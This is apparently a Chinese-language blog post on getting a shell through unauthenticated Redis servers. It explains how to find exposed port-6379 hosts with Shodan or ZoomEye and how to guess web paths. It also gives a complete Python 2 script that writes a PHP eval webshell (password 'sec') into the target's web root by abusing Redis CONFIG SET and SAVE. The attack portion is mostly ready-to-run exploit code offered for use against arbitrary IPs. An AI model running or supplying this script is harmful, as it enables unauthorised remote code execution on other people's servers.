Redis默認端口是6379,可以通過zoomeye或者shodan來查找開放6379的端口,能收到很多對外開放6379端口的ip,而且絕大部門是未授權訪問的,因為默認redis是未授權訪問。但是還有一先決條件是該ip開放web服務,也就是開放如常見的80端口等,滿足這兩個條件你就有可能getshell。但是還有最麻煩的一件事是,你必須要知道網站web路徑。這邊只能靠網站報錯泄漏路徑,phpinfo文件為刪除,文件包含漏洞等,不然只能靠猜了,比如iis服務器的路徑c:/inetpub/wwwroot等,linux服務器/var/www, /var/www/html等。
- 可以用redis-cli客戶端連上redis服務器
- 然后可以用info驗證是否有信息
- 通過設置路徑,設置webshell名字和內容getshell
總結一下,redis getshell條件
- redis可以未授權訪問,或者弱口令訪問
- redis服務器還開放了web服務
- 知道web服務器的路徑
以下還有一個redis getshell的腳本
#!/usr/bin/env python
# coding=utf8
# author=Cy3ber http://www.cy3ber.com
import redis
import sys
def log(text):
print '[*]------' + text
def getshell(ip='127.0.0.1', pt=6379, webdir='/var/www/', socket_timeout=10):
try:
r = redis.StrictRedis(host=ip, port=pt)
if r.config_set('dir', webdir) == True and r.config_set('dbfilename', 'safe.php')
== True:
log('set shell on %safe.php sucsessed' % (webdir))
else:
log('set shell dir failed')
sys.exit(1)
if r.set('myshell', "<?php @eval($_POST['sec']);?>") == True:
log('set eval sucsessed')
else:
log('set eval failed')
sys.exit(1)
if r.save() == True:
log('save shell as %safe.php sucsessed password is "sec"'%(webdir))
log('getshell sucsessed please check')
else:
log('getshell failed')
except:
log('error')
if __name__ == '__main__':
if len(sys.argv) <> 4:
print "\n+-----------------------------+"
print "| JbossGetshell |"
print "| Cy3ber - cy3ber.com |"
print "| Email:webmaster@cy3ber.com |"
print "+-----------------------------+\n"
print 'Usage:python redisgetshell.py ip port webdir'
print "explame:python redisgetshell.py 10.0.18.1 6379 /data/web/"
sys.exit(1)
else:
getshell(ip=sys.argv[1],pt=sys.argv[2],webdir=sys.argv[3])